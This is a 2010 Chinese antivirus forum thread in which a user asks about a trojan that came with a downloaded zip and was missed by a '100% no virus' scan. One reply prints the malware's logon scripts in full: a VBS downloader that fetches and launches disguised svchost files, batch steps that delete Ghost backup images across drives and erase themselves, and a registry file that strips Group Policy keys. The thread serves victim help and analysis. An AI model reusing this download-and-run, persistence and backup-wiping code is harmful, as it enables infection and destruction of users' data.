12   1  /  2  页   跳转

[求助] 怎么回事啊?100%中招了

怎么回事啊?100%中招了



用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
分享到:
gototop
 

回复:怎么回事啊?100%中招了

中招我不怕,主要不甘心在提示100%没发现病毒提示下安装的,我是在几天后无意中发现进程老是cmd.exe和conime.exe同时存在,有找不到cmd.exe启动的原因,在朋友提示下找到登录脚本才发现的,现在只希望知道他下载了什么,安装了什么,还驻留了什么?删的东西是什么?我还是在华军软件圆下载的,下载地址h t t p://jsnetcom.onlinedown.com/down/zrswp3_newhua_x8z.zip,前面http加了空格,没一定功夫勿去下哈
最后编辑jxchufei 最后编辑于 2010-11-07 01:22:05
gototop
 

回复:怎么回事啊?100%中招了

3.bat
@Echo Off
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
regedit.exe/s %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\winrp.reg
sys.bat
@Echo Off
Del %0
ssys.bat
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping www.google.com &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs
Exit
:End
ping  &&Goto ok
Goto End
yici.bat
@Echo Off
md "%SystemRoot%\ehome"
ping  &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\ca.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\ehome\cacls.vbs
Del %0
:End
ping www.google.com &&Goto ok
Goto End
notepa.bat
@Echo Off
Del /f/s/q %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\sys.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
rename %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\ssys.bat sys.bat
:Next
Del /f/s/q d:\*.GHO
Del /f/s/q e:\*.GHO
Del /f/s/q f:\*.GHO
Del /f/s/q g:\*.GHO
Del /f/s/q h:\*.GHO
Del /f/s/q i:\*.GHO
Del /f/s/q j:\*.GHO
Del /f/s/q k:\*.GHO
Del /f/s/q %SystemRoot%\Logon\sys.bat
Del /f/s/q %SystemRoot%\Logon\shijian.vbs
Del /f/s/q %SystemRoot%\Logon\index.vbs
rd 2 /s/q %SystemRoot%\GroupPolicy
Del /f/s/q %SystemRoot%\system32\GroupPolicy\33.vbs
Del /f/s/q %SystemRoot%\system32\GroupPolicy\2.bat
dEL %0

donw.vbs

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
wscript.sleep 1
sGet.SaveToFile iLocal,1

shijian.vbs
Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000

winrp.reg
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy]
最后编辑超级游戏迷 最后编辑于 2010-11-07 00:48:57
gototop
 

回复:怎么回事啊?100%中招了

明显去下了几个文件.又删出了不少,但我在他下载的目录中没找到下载的文件,他自己删出了吗?还是没下载安装上?
最后编辑jxchufei 最后编辑于 2010-11-07 00:36:45
gototop
 

回复:怎么回事啊?100%中招了

打酱油的跑了啊
gototop
 

回复 7F 超级游戏迷 的帖子

能告诉你们工程师测试下他下载安装什么的吗?我可是2006年注册用户
gototop
 

回复:怎么回事啊?100%中招了

custsat.dll 现在只有这个文件了,还要上传吗?我发的那个连接还有效,你们可以安装下啊
gototop
 

回复:怎么回事啊?100%中招了

你该不会叫我重新安装1次木马吧?我发帖前已经把那几个文件删了
gototop
 

回复:怎么回事啊?100%中招了

不过我当初把代码全发你们了,看4楼啊
gototop
 

回复:怎么回事啊?100%中招了

睡觉拉,但愿明天我卡上的钱还在,估计睡不塌实.麻烦工作人员告诉你们管事的,在杀完毒后只提示没发现病毒,请把前面100%除掉可以吗 可以容忍有没杀到,但100%的提示有点过了
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT